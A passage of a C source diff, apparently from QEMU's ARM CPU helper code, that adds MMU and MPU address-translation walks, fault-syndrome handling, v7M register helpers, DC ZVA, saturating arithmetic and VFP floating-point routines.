- level))) & descmask; + descaddr &= ~7ULL; + descriptor = ldq_phys(cs->as, descaddr); + if (!(descriptor & 1) || + (!(descriptor & 2) && (level == 3))) { + /* Invalid, or the Reserved level 3 encoding */ + goto do_fault; + } + descaddr = descriptor & 0xfffffff000ULL; + + if ((descriptor & 2) && (level < 3)) { + /* Table entry. The top five bits are attributes which may + * propagate down through lower levels of the table (and + * which are all arranged so that 0 means "no effect", so + * we can gather them up by ORing in the bits at each level). + */ + tableattrs |= extract64(descriptor, 59, 5); + level++; + continue; + } + /* Block entry at level 1 or 2, or page entry at level 3. + * These are basically the same thing, although the number + * of bits we pull in from the vaddr varies. + */ + page_size = (1ULL << ((granule_sz * (4 - level)) + 3)); + descaddr |= (address & (page_size - 1)); + /* Extract attributes from the descriptor and merge with table attrs */ + attrs = extract64(descriptor, 2, 10) + | (extract64(descriptor, 52, 12) << 10); + attrs |= extract32(tableattrs, 0, 2) << 11; /* XN, PXN */ + attrs |= extract32(tableattrs, 3, 1) << 5; /* APTable[1] => AP[2] */ + /* The sense of AP[1] vs APTable[0] is reversed, as APTable[0] == 1 + * means "force PL1 access only", which means forcing AP[1] to 0. + */ + if (extract32(tableattrs, 2, 1)) { + attrs &= ~(1 << 4); + } + /* Since we're always in the Non-secure state, NSTable is ignored. */ + break; + } + /* Here descaddr is the final physical address, and attributes + * are all in attrs. + */ + fault_type = access_fault; + if ((attrs & (1 << 8)) == 0) { + /* Access flag */ + goto do_fault; + } + fault_type = permission_fault; + if (is_user && !(attrs & (1 << 4))) { + /* Unprivileged access not enabled */ + goto do_fault; + } + *prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; + if ((arm_feature(env, ARM_FEATURE_V8) && is_user && (attrs & (1 << 12))) || + (!arm_feature(env, ARM_FEATURE_V8) && (attrs & (1 << 12))) || + (!is_user && (attrs & (1 << 11)))) { + /* XN/UXN or PXN. Since we only implement EL0/EL1 we unconditionally + * treat XN/UXN as UXN for v8. + */ + if (access_type == 2) { + goto do_fault; + } + *prot &= ~PAGE_EXEC; + } + if (attrs & (1 << 5)) { + /* Write access forbidden */ + if (access_type == 1) { + goto do_fault; + } + *prot &= ~PAGE_WRITE; + } + + *phys_ptr = descaddr; + *page_size_ptr = page_size; + return 0; + +do_fault: + /* Long-descriptor format IFSR/DFSR value */ + return (1 << 9) | (fault_type << 2) | level; +} + +static int get_phys_addr_mpu(CPUARMState *env, uint32_t address, + int access_type, int is_user, + hwaddr *phys_ptr, int *prot) +{ + int n; + uint32_t mask; + uint32_t base; + + *phys_ptr = address; + for (n = 7; n >= 0; n--) { + base = env->cp15.c6_region[n]; + if ((base & 1) == 0) + continue; + mask = 1 << ((base >> 1) & 0x1f); + /* Keep this shift separate from the above to avoid an + (undefined) << 32. */ + mask = (mask << 1) - 1; + if (((base ^ address) & ~mask) == 0) + break; + } + if (n < 0) + return 2; + + if (access_type == 2) { + mask = env->cp15.pmsav5_insn_ap; + } else { + mask = env->cp15.pmsav5_data_ap; + } + mask = (mask >> (n * 4)) & 0xf; + switch (mask) { + case 0: + return 1; + case 1: + if (is_user) + return 1; + *prot = PAGE_READ | PAGE_WRITE; + break; + case 2: + *prot = PAGE_READ; + if (!is_user) + *prot |= PAGE_WRITE; + break; + case 3: + *prot = PAGE_READ | PAGE_WRITE; + break; + case 5: + if (is_user) + return 1; + *prot = PAGE_READ; + break; + case 6: + *prot = PAGE_READ; + break; + default: + /* Bad permission. */ + return 1; + } + *prot |= PAGE_EXEC; + return 0; +} + +/* get_phys_addr - get the physical address for this virtual address + * + * Find the physical address corresponding to the given virtual address, + * by doing a translation table walk on MMU based systems or using the + * MPU state on MPU based systems. + * + * Returns 0 if the translation was successful. Otherwise, phys_ptr, + * prot and page_size are not filled in, and the return value provides + * information on why the translation aborted, in the format of a + * DFSR/IFSR fault register, with the following caveats: + * * we honour the short vs long DFSR format differences. + * * the WnR bit is never set (the caller must do this). + * * for MPU based systems we don't bother to return a full FSR format + * value. + * + * @env: CPUARMState + * @address: virtual address to get physical address for + * @access_type: 0 for read, 1 for write, 2 for execute + * @is_user: 0 for privileged access, 1 for user + * @phys_ptr: set to the physical address corresponding to the virtual address + * @prot: set to the permissions for the page containing phys_ptr + * @page_size: set to the size of the page containing phys_ptr + */ +static inline int get_phys_addr(CPUARMState *env, target_ulong address, + int access_type, int is_user, + hwaddr *phys_ptr, int *prot, + target_ulong *page_size) +{ + /* Fast Context Switch Extension. */ + if (address < 0x02000000) + address += env->cp15.c13_fcse; + + if ((env->cp15.c1_sys & SCTLR_M) == 0) { + /* MMU/MPU disabled. */ + *phys_ptr = address; + *prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; + *page_size = TARGET_PAGE_SIZE; + return 0; + } else if (arm_feature(env, ARM_FEATURE_MPU)) { + *page_size = TARGET_PAGE_SIZE; + return get_phys_addr_mpu(env, address, access_type, is_user, phys_ptr, + prot); + } else if (extended_addresses_enabled(env)) { + return get_phys_addr_lpae(env, address, access_type, is_user, phys_ptr, + prot, page_size); + } else if (env->cp15.c1_sys & SCTLR_XP) { + return get_phys_addr_v6(env, address, access_type, is_user, phys_ptr, + prot, page_size); + } else { + return get_phys_addr_v5(env, address, access_type, is_user, phys_ptr, + prot, page_size); + } +} + +int arm_cpu_handle_mmu_fault(CPUState *cs, vaddr address, + int access_type, int mmu_idx) +{ + CPUARMState *env = cs->env_ptr; + hwaddr phys_addr; + target_ulong page_size; + int prot; + int ret, is_user; + uint32_t syn; + bool same_el = (arm_current_el(env) != 0); + + is_user = mmu_idx == MMU_USER_IDX; + ret = get_phys_addr(env, address, access_type, is_user, &phys_addr, &prot, + &page_size); + if (ret == 0) { + /* Map a single [sub]page. */ + phys_addr &= TARGET_PAGE_MASK; + address &= TARGET_PAGE_MASK; + tlb_set_page(cs, address, phys_addr, prot, mmu_idx, page_size); + return 0; + } + + /* AArch64 syndrome does not have an LPAE bit */ + syn = ret & ~(1 << 9); + + /* For insn and data aborts we assume there is no instruction syndrome + * information; this is always true for exceptions reported to EL1. + */ + if (access_type == 2) { + syn = syn_insn_abort(same_el, 0, 0, syn); + cs->exception_index = EXCP_PREFETCH_ABORT; + } else { + syn = syn_data_abort(same_el, 0, 0, 0, access_type == 1, syn); + if (access_type == 1 && arm_feature(env, ARM_FEATURE_V6)) { + ret |= (1 << 11); + } + cs->exception_index = EXCP_DATA_ABORT; + } + + env->exception.syndrome = syn; + env->exception.vaddress = address; + env->exception.fsr = ret; + return 1; +} + +hwaddr arm_cpu_get_phys_page_debug(CPUState *cs, vaddr addr) +{ + ARMCPU *cpu = ARM_CPU(NULL, cs); + hwaddr phys_addr; + target_ulong page_size; + int prot; + int ret; + + ret = get_phys_addr(&cpu->env, addr, 0, 0, &phys_addr, &prot, &page_size); + + if (ret != 0) { + return -1; + } + + return phys_addr; +} + +void HELPER(set_r13_banked)(CPUARMState *env, uint32_t mode, uint32_t val) +{ + if ((env->uncached_cpsr & CPSR_M) == mode) { + env->regs[13] = val; + } else { + env->banked_r13[bank_number(mode)] = val; + } +} + +uint32_t HELPER(get_r13_banked)(CPUARMState *env, uint32_t mode) +{ + if ((env->uncached_cpsr & CPSR_M) == mode) { + return env->regs[13]; + } else { + return env->banked_r13[bank_number(mode)]; + } +} + +uint32_t HELPER(v7m_mrs)(CPUARMState *env, uint32_t reg) +{ + ARMCPU *cpu = arm_env_get_cpu(env); + + switch (reg) { + case 0: /* APSR */ + return xpsr_read(env) & 0xf8000000; + case 1: /* IAPSR */ + return xpsr_read(env) & 0xf80001ff; + case 2: /* EAPSR */ + return xpsr_read(env) & 0xff00fc00; + case 3: /* xPSR */ + return xpsr_read(env) & 0xff00fdff; + case 5: /* IPSR */ + return xpsr_read(env) & 0x000001ff; + case 6: /* EPSR */ + return xpsr_read(env) & 0x0700fc00; + case 7: /* IEPSR */ + return xpsr_read(env) & 0x0700edff; + case 8: /* MSP */ + return env->v7m.current_sp ? env->v7m.other_sp : env->regs[13]; + case 9: /* PSP */ + return env->v7m.current_sp ? env->regs[13] : env->v7m.other_sp; + case 16: /* PRIMASK */ + return (env->daif & PSTATE_I) != 0; + case 17: /* BASEPRI */ + case 18: /* BASEPRI_MAX */ + return env->v7m.basepri; + case 19: /* FAULTMASK */ + return (env->daif & PSTATE_F) != 0; + case 20: /* CONTROL */ + return env->v7m.control; + default: + /* ??? For debugging only. */ + cpu_abort(CPU(cpu), "Unimplemented system register read (%d)\n", reg); + return 0; + } +} + +void HELPER(v7m_msr)(CPUARMState *env, uint32_t reg, uint32_t val) +{ + ARMCPU *cpu = arm_env_get_cpu(env); + + switch (reg) { + case 0: /* APSR */ + xpsr_write(env, val, 0xf8000000); + break; + case 1: /* IAPSR */ + xpsr_write(env, val, 0xf8000000); + break; + case 2: /* EAPSR */ + xpsr_write(env, val, 0xfe00fc00); + break; + case 3: /* xPSR */ + xpsr_write(env, val, 0xfe00fc00); + break; + case 5: /* IPSR */ + /* IPSR bits are readonly. */ + break; + case 6: /* EPSR */ + xpsr_write(env, val, 0x0600fc00); + break; + case 7: /* IEPSR */ + xpsr_write(env, val, 0x0600fc00); + break; + case 8: /* MSP */ + if (env->v7m.current_sp) + env->v7m.other_sp = val; + else + env->regs[13] = val; + break; + case 9: /* PSP */ + if (env->v7m.current_sp) + env->regs[13] = val; + else + env->v7m.other_sp = val; + break; + case 16: /* PRIMASK */ + if (val & 1) { + env->daif |= PSTATE_I; + } else { + env->daif &= ~PSTATE_I; + } + break; + case 17: /* BASEPRI */ + env->v7m.basepri = val & 0xff; + break; + case 18: /* BASEPRI_MAX */ + val &= 0xff; + if (val != 0 && (val < env->v7m.basepri || env->v7m.basepri == 0)) + env->v7m.basepri = val; + break; + case 19: /* FAULTMASK */ + if (val & 1) { + env->daif |= PSTATE_F; + } else { + env->daif &= ~PSTATE_F; + } + break; + case 20: /* CONTROL */ + env->v7m.control = val & 3; + switch_v7m_sp(env, (val & 2) != 0); + break; + default: + /* ??? For debugging only. */ + cpu_abort(CPU(cpu), "Unimplemented system register write (%d)\n", reg); + return; + } +} + +#endif + +void HELPER(dc_zva)(CPUARMState *env, uint64_t vaddr_in) +{ + /* Implement DC ZVA, which zeroes a fixed-length block of memory. + * Note that we do not implement the (architecturally mandated) + * alignment fault for attempts to use this on Device memory + * (which matches the usual QEMU behaviour of not implementing either + * alignment faults or any memory attribute handling). + */ + + ARMCPU *cpu = arm_env_get_cpu(env); + uint64_t blocklen = 4 << cpu->dcz_blocksize; + uint64_t vaddr = vaddr_in & ~(blocklen - 1); + +#ifndef CONFIG_USER_ONLY + { + /* Slightly awkwardly, QEMU's TARGET_PAGE_SIZE may be less than + * the block size so we might have to do more than one TLB lookup. + * We know that in fact for any v8 CPU the page size is at least 4K + * and the block size must be 2K or less, but TARGET_PAGE_SIZE is only + * 1K as an artefact of legacy v5 subpage support being present in the + * same QEMU executable. + */ + + int maxidx = DIV_ROUND_UP(blocklen, TARGET_PAGE_SIZE); + // msvc doesnt allow non-constant array sizes, so we work out the size it would be + // TARGET_PAGE_SIZE is 1024 + // blocklen is 64 + // maxidx = (blocklen+TARGET_PAGE_SIZE-1) / TARGET_PAGE_SIZE + // = (64+1024-1) / 1024 + // = 1 +#ifdef _MSC_VER + void *hostaddr[1]; +#else + void *hostaddr[maxidx]; +#endif + int try, i; + + for (try = 0; try < 2; try++) { + + for (i = 0; i < maxidx; i++) { + hostaddr[i] = tlb_vaddr_to_host(env, + vaddr + TARGET_PAGE_SIZE * i, + 1, cpu_mmu_index(env)); + if (!hostaddr[i]) { + break; + } + } + if (i == maxidx) { + /* If it's all in the TLB it's fair game for just writing to; + * we know we don't need to update dirty status, etc. + */ + for (i = 0; i < maxidx - 1; i++) { + memset(hostaddr[i], 0, TARGET_PAGE_SIZE); + } + memset(hostaddr[i], 0, blocklen - (i * TARGET_PAGE_SIZE)); + return; + } + /* OK, try a store and see if we can populate the tlb. This + * might cause an exception if the memory isn't writable, + * in which case we will longjmp out of here. We must for + * this purpose use the actual register value passed to us + * so that we get the fault address right. + */ + helper_ret_stb_mmu(env, vaddr_in, 0, cpu_mmu_index(env), GETRA()); + /* Now we can populate the other TLB entries, if any */ + for (i = 0; i < maxidx; i++) { + uint64_t va = vaddr + TARGET_PAGE_SIZE * i; + if (va != (vaddr_in & TARGET_PAGE_MASK)) { + helper_ret_stb_mmu(env, va, 0, cpu_mmu_index(env), GETRA()); + } + } + } + + /* Slow path (probably attempt to do this to an I/O device or + * similar, or clearing of a block of code we have translations + * cached for). Just do a series of byte writes as the architecture + * demands. It's not worth trying to use a cpu_physical_memory_map(), + * memset(), unmap() sequence here because: + * + we'd need to account for the blocksize being larger than a page + * + the direct-RAM access case is almost always going to be dealt + * with in the fastpath code above, so there's no speed benefit + * + we would have to deal with the map returning NULL because the + * bounce buffer was in use + */ + for (i = 0; i < blocklen; i++) { + helper_ret_stb_mmu(env, vaddr + i, 0, cpu_mmu_index(env), GETRA()); + } + } +#else + memset(g2h(vaddr), 0, blocklen); +#endif +} + +/* Note that signed overflow is undefined in C. The following routines are + careful to use unsigned types where modulo arithmetic is required. + Failure to do so _will_ break on newer gcc. */ + +/* Signed saturating arithmetic. */ + +/* Perform 16-bit signed saturating addition. */ +static inline uint16_t add16_sat(uint16_t a, uint16_t b) +{ + uint16_t res; + + res = a + b; + if (((res ^ a) & 0x8000) && !((a ^ b) & 0x8000)) { + if (a & 0x8000) + res = 0x8000; + else + res = 0x7fff; + } + return res; +} + +/* Perform 8-bit signed saturating addition. */ +static inline uint8_t add8_sat(uint8_t a, uint8_t b) +{ + uint8_t res; + + res = a + b; + if (((res ^ a) & 0x80) && !((a ^ b) & 0x80)) { + if (a & 0x80) + res = 0x80; + else + res = 0x7f; + } + return res; +} + +/* Perform 16-bit signed saturating subtraction. */ +static inline uint16_t sub16_sat(uint16_t a, uint16_t b) +{ + uint16_t res; + + res = a - b; + if (((res ^ a) & 0x8000) && ((a ^ b) & 0x8000)) { + if (a & 0x8000) + res = 0x8000; + else + res = 0x7fff; + } + return res; +} + +/* Perform 8-bit signed saturating subtraction. */ +static inline uint8_t sub8_sat(uint8_t a, uint8_t b) +{ + uint8_t res; + + res = a - b; + if (((res ^ a) & 0x80) && ((a ^ b) & 0x80)) { + if (a & 0x80) + res = 0x80; + else + res = 0x7f; + } + return res; +} + +#define ADD16(a, b, n) RESULT(add16_sat(a, b), n, 16); +#define SUB16(a, b, n) RESULT(sub16_sat(a, b), n, 16); +#define ADD8(a, b, n) RESULT(add8_sat(a, b), n, 8); +#define SUB8(a, b, n) RESULT(sub8_sat(a, b), n, 8); +#define PFX q + +#include "op_addsub.h" + +/* Unsigned saturating arithmetic. */ +static inline uint16_t add16_usat(uint16_t a, uint16_t b) +{ + uint16_t res; + res = a + b; + if (res < a) + res = 0xffff; + return res; +} + +static inline uint16_t sub16_usat(uint16_t a, uint16_t b) +{ + if (a > b) + return a - b; + else + return 0; +} + +static inline uint8_t add8_usat(uint8_t a, uint8_t b) +{ + uint8_t res; + res = a + b; + if (res < a) + res = 0xff; + return res; +} + +static inline uint8_t sub8_usat(uint8_t a, uint8_t b) +{ + if (a > b) + return a - b; + else + return 0; +} + +#define ADD16(a, b, n) RESULT(add16_usat(a, b), n, 16); +#define SUB16(a, b, n) RESULT(sub16_usat(a, b), n, 16); +#define ADD8(a, b, n) RESULT(add8_usat(a, b), n, 8); +#define SUB8(a, b, n) RESULT(sub8_usat(a, b), n, 8); +#define PFX uq + +#include "op_addsub.h" + +/* Signed modulo arithmetic. */ +#define SARITH16(a, b, n, op) do { \ + int32_t sum; \ + sum = (int32_t)(int16_t)(a) op (int32_t)(int16_t)(b); \ + RESULT(sum, n, 16); \ + if (sum >= 0) \ + ge |= 3 << (n * 2); \ + } while(0) + +#define SARITH8(a, b, n, op) do { \ + int32_t sum; \ + sum = (int32_t)(int8_t)(a) op (int32_t)(int8_t)(b); \ + RESULT(sum, n, 8); \ + if (sum >= 0) \ + ge |= 1 << n; \ + } while(0) + + +#define ADD16(a, b, n) SARITH16(a, b, n, +) +#define SUB16(a, b, n) SARITH16(a, b, n, -) +#define ADD8(a, b, n) SARITH8(a, b, n, +) +#define SUB8(a, b, n) SARITH8(a, b, n, -) +#define PFX s +#define ARITH_GE + +#include "op_addsub.h" + +/* Unsigned modulo arithmetic. */ +#define ADD16(a, b, n) do { \ + uint32_t sum; \ + sum = (uint32_t)(uint16_t)(a) + (uint32_t)(uint16_t)(b); \ + RESULT(sum, n, 16); \ + if ((sum >> 16) == 1) \ + ge |= 3 << (n * 2); \ + } while(0) + +#define ADD8(a, b, n) do { \ + uint32_t sum; \ + sum = (uint32_t)(uint8_t)(a) + (uint32_t)(uint8_t)(b); \ + RESULT(sum, n, 8); \ + if ((sum >> 8) == 1) \ + ge |= 1 << n; \ + } while(0) + +#define SUB16(a, b, n) do { \ + uint32_t sum; \ + sum = (uint32_t)(uint16_t)(a) - (uint32_t)(uint16_t)(b); \ + RESULT(sum, n, 16); \ + if ((sum >> 16) == 0) \ + ge |= 3 << (n * 2); \ + } while(0) + +#define SUB8(a, b, n) do { \ + uint32_t sum; \ + sum = (uint32_t)(uint8_t)(a) - (uint32_t)(uint8_t)(b); \ + RESULT(sum, n, 8); \ + if ((sum >> 8) == 0) \ + ge |= 1 << n; \ + } while(0) + +#define PFX u +#define ARITH_GE + +#include "op_addsub.h" + +/* Halved signed arithmetic. */ +#define ADD16(a, b, n) \ + RESULT(((int32_t)(int16_t)(a) + (int32_t)(int16_t)(b)) >> 1, n, 16) +#define SUB16(a, b, n) \ + RESULT(((int32_t)(int16_t)(a) - (int32_t)(int16_t)(b)) >> 1, n, 16) +#define ADD8(a, b, n) \ + RESULT(((int32_t)(int8_t)(a) + (int32_t)(int8_t)(b)) >> 1, n, 8) +#define SUB8(a, b, n) \ + RESULT(((int32_t)(int8_t)(a) - (int32_t)(int8_t)(b)) >> 1, n, 8) +#define PFX sh + +#include "op_addsub.h" + +/* Halved unsigned arithmetic. */ +#define ADD16(a, b, n) \ + RESULT(((uint32_t)(uint16_t)(a) + (uint32_t)(uint16_t)(b)) >> 1, n, 16) +#define SUB16(a, b, n) \ + RESULT(((uint32_t)(uint16_t)(a) - (uint32_t)(uint16_t)(b)) >> 1, n, 16) +#define ADD8(a, b, n) \ + RESULT(((uint32_t)(uint8_t)(a) + (uint32_t)(uint8_t)(b)) >> 1, n, 8) +#define SUB8(a, b, n) \ + RESULT(((uint32_t)(uint8_t)(a) - (uint32_t)(uint8_t)(b)) >> 1, n, 8) +#define PFX uh + +#include "op_addsub.h" + +static inline uint8_t do_usad(uint8_t a, uint8_t b) +{ + if (a > b) + return a - b; + else + return b - a; +} + +/* Unsigned sum of absolute byte differences. */ +uint32_t HELPER(usad8)(uint32_t a, uint32_t b) +{ + uint32_t sum; + sum = do_usad(a, b); + sum += do_usad(a >> 8, b >> 8); + sum += do_usad(a >> 16, b >>16); + sum += do_usad(a >> 24, b >> 24); + return sum; +} + +/* For ARMv6 SEL instruction. */ +uint32_t HELPER(sel_flags)(uint32_t flags, uint32_t a, uint32_t b) +{ + uint32_t mask; + + mask = 0; + if (flags & 1) + mask |= 0xff; + if (flags & 2) + mask |= 0xff00; + if (flags & 4) + mask |= 0xff0000; + if (flags & 8) + mask |= 0xff000000; + return (a & mask) | (b & ~mask); +} + +/* VFP support. We follow the convention used for VFP instructions: + Single precision routines have a "s" suffix, double precision a + "d" suffix. */ + +/* Convert host exception flags to vfp form. */ +static inline int vfp_exceptbits_from_host(int host_bits) +{ + int target_bits = 0; + + if (host_bits & float_flag_invalid) + target_bits |= 1; + if (host_bits & float_flag_divbyzero) + target_bits |= 2; + if (host_bits & float_flag_overflow) + target_bits |= 4; + if (host_bits & (float_flag_underflow | float_flag_output_denormal)) + target_bits |= 8; + if (host_bits & float_flag_inexact) + target_bits |= 0x10; + if (host_bits & float_flag_input_denormal) + target_bits |= 0x80; + return target_bits; +} + +uint32_t HELPER(vfp_get_fpscr)(CPUARMState *env) +{ + int i; + uint32_t fpscr; + + fpscr = (env->vfp.xregs[ARM_VFP_FPSCR] & 0xffc8ffff) + | (env->vfp.vec_len << 16) + | (env->vfp.vec_stride << 20); + i = get_float_exception_flags(&env->vfp.fp_status); + i |= get_float_exception_flags(&env->vfp.standard_fp_status); + fpscr |= vfp_exceptbits_from_host(i); + return fpscr; +} + +uint32_t vfp_get_fpscr(CPUARMState *env) +{ + return HELPER(vfp_get_fpscr)(env); +} + +/* Convert vfp exception flags to target form. */ +static inline int vfp_exceptbits_to_host(int target_bits) +{ + int host_bits = 0; + + if (target_bits & 1) + host_bits |= float_flag_invalid; + if (target_bits & 2) + host_bits |= float_flag_divbyzero; + if (target_bits & 4) + host_bits |= float_flag_overflow; + if (target_bits & 8) + host_bits |= float_flag_underflow; + if (target_bits & 0x10) + host_bits |= float_flag_inexact; + if (target_bits & 0x80) + host_bits |= float_flag_input_denormal; + return host_bits; +} + +void HELPER(vfp_set_fpscr)(CPUARMState *env, uint32_t val) +{ + int i; + uint32_t changed; + + changed = env->vfp.xregs[ARM_VFP_FPSCR]; + env->vfp.xregs[ARM_VFP_FPSCR] = (val & 0xffc8ffff); + env->vfp.vec_len = (val >> 16) & 7; + env->vfp.vec_stride = (val >> 20) & 3; + + changed ^= val; + if (changed & (3 << 22)) { + i = (val >> 22) & 3; + switch (i) { + case FPROUNDING_TIEEVEN: + i = float_round_nearest_even; + break; + case FPROUNDING_POSINF: + i = float_round_up; + break; + case FPROUNDING_NEGINF: + i = float_round_down; + break; + case FPROUNDING_ZERO: + i = float_round_to_zero; + break; + } + set_float_rounding_mode(i, &env->vfp.fp_status); + } + if (changed & (1 << 24)) { + set_flush_to_zero((val & (1 << 24)) != 0, &env->vfp.fp_status); + set_flush_inputs_to_zero((val & (1 << 24)) != 0, &env->vfp.fp_status); + } + if (changed & (1 << 25)) + set_default_nan_mode((val & (1 << 25)) != 0, &env->vfp.fp_status); + + i = vfp_exceptbits_to_host(val); + set_float_exception_flags(i, &env->vfp.fp_status); + set_float_exception_flags(0, &env->vfp.standard_fp_status); +} + +void vfp_set_fpscr(CPUARMState *env, uint32_t val) +{ + HELPER(vfp_set_fpscr)(env, val); +} + +#define VFP_HELPER(name, p) HELPER(glue(glue(vfp_,name),p)) + +#define VFP_BINOP(name) \ +float32 VFP_HELPER(name, s)(float32 a, float32 b, void *fpstp) \ +{ \ + float_status *fpst = fpstp; \ + return float32_ ## name(a, b, fpst); \ +} \ +float64 VFP_HELPER(name, d)(float64 a, float64 b, void *fpstp) \ +{ \ + float_status *fpst = fpstp; \ + return float64_ ## name(a, b, fpst); \ +} +VFP_BINOP(add) +VFP_BINOP(sub) +VFP_BINOP(mul) +VFP_BINOP(div) +VFP_BINOP(min) +VFP_BINOP(max) +VFP_BINOP(minnum) +VFP_BINOP(maxnum) +#undef VFP_BINOP + +float32 VFP_HELPER(neg, s)(float32 a) +{ + return float32_chs(a); +} + +float64 VFP_HELPER(neg, d)(float64 a) +{ + return float64_chs(a); +} + +float32 VFP_HELPER(abs, s)(float32 a) +{ + return float32_abs(a); +} + +float64 VFP_HELPER(abs, d)(float64 a) +{ + return float64_abs(a); +} + +float32 VFP_HELPER(sqrt, s)(float32 a, CPUARMState *env) +{ + return float32_sqrt(a, &env->vfp.fp_status); +} + +float64 VFP_HELPER(sqrt, d)(float64 a, CPUARMState *env) +{ + return float64_sqrt(a, &env->vfp.fp_status); +} + +/* XXX: check quiet/signaling case */ +#define DO_VFP_cmp(p, type) \ +void VFP_HELPER(cmp, p)(type a, type b, CPUARMState *env) \ +{ \ + uint32_t flags; \ + switch(type ## _compare_quiet(a, b, &env->vfp.fp_status)) { \ + case 0: flags = 0x6; break; \ + case -1: flags = 0x8; break; \ + case 1: flags = 0x2; break; \ + default: case 2: flags = 0x3; break; \ + } \ + env->vfp.xregs[ARM_VFP_FPSCR] = (flags << 28) \ + | (env->vfp.xregs[ARM_VFP_FPSCR] & 0x0fffffff); \ +} \ +void VFP_HELPER(cmpe, p)(type a, type b, CPUARMState *env) \ +{ \ + uint32_t flags; \ + switch(type ## _compare(a, b, &env->vfp.fp_status)) { \ + case 0: flags = 0x6; break; \ + case -1: flags = 0x8; break; \ + case 1: flags = 0x2; break; \ + default: case 2: flags = 0x3; break; \ + } \ + env->vfp.xregs[ARM_VFP_FPSCR] = (flags << 28) \ + | (env->vfp.xregs[ARM_VFP_FPSCR] & 0x0fffffff); \ +} +DO_VFP_cmp(s, float32) +DO_VFP_cmp(d, float64) +#undef DO_VFP_cmp + +/* Integer to float and float to integer conversions */ + +#define CONV_ITOF(name, fsz, sign) \ + float##fsz HELPER(name)(uint32_t x, void *fpstp) \ +{ \ + float_status *fpst = fpstp; \ + return sign##int32_to_##float##fsz((sign##int32_t)x, fpst); \ +} + +#define CONV_FTOI(name, fsz, sign, round) \ +uint32_t HELPER(name)(float##fsz x, void *fpstp) \ +{ \ + float_status *fpst = fpstp; \ + if (float##fsz##_is_any_nan(x)) { \ + float_raise(float_flag_invalid, fpst); \ + return 0; \ + } \ + return float##fsz##_to_##sign##int32##round(x, fpst); \ +} + +#define FLOAT_CONVS(name, p, fsz, sign) \ +CONV_ITOF(vfp_##name##to##p, fsz, sign) \ +CONV_FTOI(vfp_to##name##p, fsz, sign, ) \ +CONV_FTOI(vfp_to##name##z##p, fsz, sign, _round_to_zero) + +FLOAT_CONVS(si, s, 32, ) +FLOAT_CONVS(si, d, 64, ) +FLOAT_CONVS(ui, s, 32, u) +FLOAT_CONVS(ui, d, 64, u) + +#undef CONV_ITOF +#undef CONV_FTOI +#undef FLOAT_CONVS + +/* floating point conversion */ +float64 VFP_HELPER(fcvtd, s)(float32 x, CPUARMState *env) +{ + float64 r = float32_to_float64(x, &env->vfp.fp_status); + /* ARM requires that S<->D conversion of any kind of NaN generates + * a quiet NaN by forcing the most significant frac bit to 1. + */ + return float64_maybe_silence_nan(r); +} + +float32 VFP_HELPER(fcvts, d)(float64 x, CPUARMState *env) +{ + float32 r = float64_to_float32(x, &env->vfp.fp_status); + /* ARM requires that S<->D conversion of any kind of NaN generates + * a quiet NaN by forcing the most significant frac bit to 1. + */ + return float32_maybe_silence_nan(r); +} + +/* VFP3 fixed point conversion. */ +#define VFP_CONV_FIX_FLOAT(name, p, fsz, isz, itype) \ +float##fsz HELPER(vfp_##name##to##p)(uint##isz##_t x, uint32_t shift, \ + void *fpstp) \ +{ \ + float_status *fpst = fpstp; \ + float##fsz tmp; \ + tmp = itype##_to_##float##fsz(x, fpst); \ + return float##fsz##_scalbn(tmp, -(int)shift, fpst); \ +} + +/* Notice that we want only input-denormal exception flags from the + * scalbn operation: the other possible flags (overflow+inexact if + * we overflow to infinity, output-denormal) aren't correct for the + * complete scale-and-convert operation. + */ +#define VFP_CONV_FLOAT_FIX_ROUND(name, p, fsz, isz, itype, round) \ +uint##isz##_t HELPER(vfp_to##name##p##round)(float##fsz x, \ + uint32_t shift, \ + void *fpstp) \ +{ \ + float_status *fpst = fpstp; \ + int old_exc_flags = get_float_exception_flags(fpst); \ + float##fsz tmp; \ + if (float##fsz##_is_any_nan(x)) { \ + float_raise(float_flag_invalid, fpst); \ + return 0; \ + } \ + tmp = float##fsz##_scalbn(x, shift, fpst); \ + old_exc_flags |= get_float_exception_flags(fpst) \ + & float_flag_input_denormal; \ + set_float_exception_flags(old_exc_flags, fpst); \ + return float##fsz##_to_##itype##round(tmp, fpst); \ +} + +#define VFP_CONV_FIX(name, p, fsz, isz, itype) \ +VFP_CONV_FIX_FLOAT(name, p, fsz, isz, itype) \ +VFP_CONV_FLOAT_FIX_ROUND(name, p, fsz, isz, itype, _round_to_zero) \ +VFP_CONV_FLOAT_FIX_ROUND(name, p, fsz, isz, itype, ) + +#define VFP_CONV_FIX_A64(name, p, fsz, isz, itype) \ +VFP_CONV_FIX_FLOAT(name, p, fsz, isz, itype) \ +VFP_CONV_FLOAT_FIX_ROUND(name, p, fsz, isz, itype, ) + +VFP_CONV_FIX(sh, d, 64, 64, int16) +VFP_CONV_FIX(sl, d, 64, 64, int32) +VFP_CONV_FIX_A64(sq, d, 64, 64, int64) +VFP_CONV_FIX(uh, d, 64, 64, uint16) +VFP_CONV_FIX(ul, d, 64, 64, uint32) +VFP_CONV_FIX_A64(uq, d, 64, 64, uint64) +VFP_CONV_FIX(sh, s, 32, 32, int16) +VFP_CONV_FIX(sl, s, 32, 32, int32) +VFP_CONV_FIX_A64(sq, s, 32, 64, int64) +VFP_CONV_FIX(uh, s, 32, 32, uint16) +VFP_CONV_FIX(ul, s, 32, 32, uint32) +VFP_CONV_FIX_A64(uq, s, 32, 64, uint64) +#undef VFP_CONV_FIX +#undef VFP_CONV_FIX_FLOAT +#undef VFP_CONV_FLOAT_FIX_ROUND + +/* Set the current fp rounding mode and return the old one. + * The argument is a softfloat float_round_ value. + */ +uint32_t HELPER(set_rmode)(uint32_t rmode, CPUARMState *env) +{ + float_status *fp_status = &env->vfp.fp_status; + + uint32_t prev_rmode = get_float_rounding_mode(fp_status); + set_float_rounding_mode(rmode, fp_status); + + return prev_rmode; +} + +/* Set the current fp rounding mode in the standard fp status and return + * the old one. This is for NEON instructions that need to change the + * rounding mode but wish to use the standard FPSCR values for everything + * else. Always set the rounding mode back to the correct value after + * modifying it. + * The argument is a softfloat float_round_ value. + */ +uint32_t HELPER(set_neon_rmode)(uint32_t rmode, CPUARMState *env) +{ + float_status *fp_status = &env->vfp.standard_fp_status; + + uint32_t prev_rmode = get_float_rounding_mode(fp_status); + set_float_rounding_mode(rmode, fp_status); + + return prev_rmode; +} + +/* Half precision conversions. */ +static float32 do_fcvt_f16_to_f32(uint32_t a, CPUARMState *env, float_status *s) +{ + int ieee = 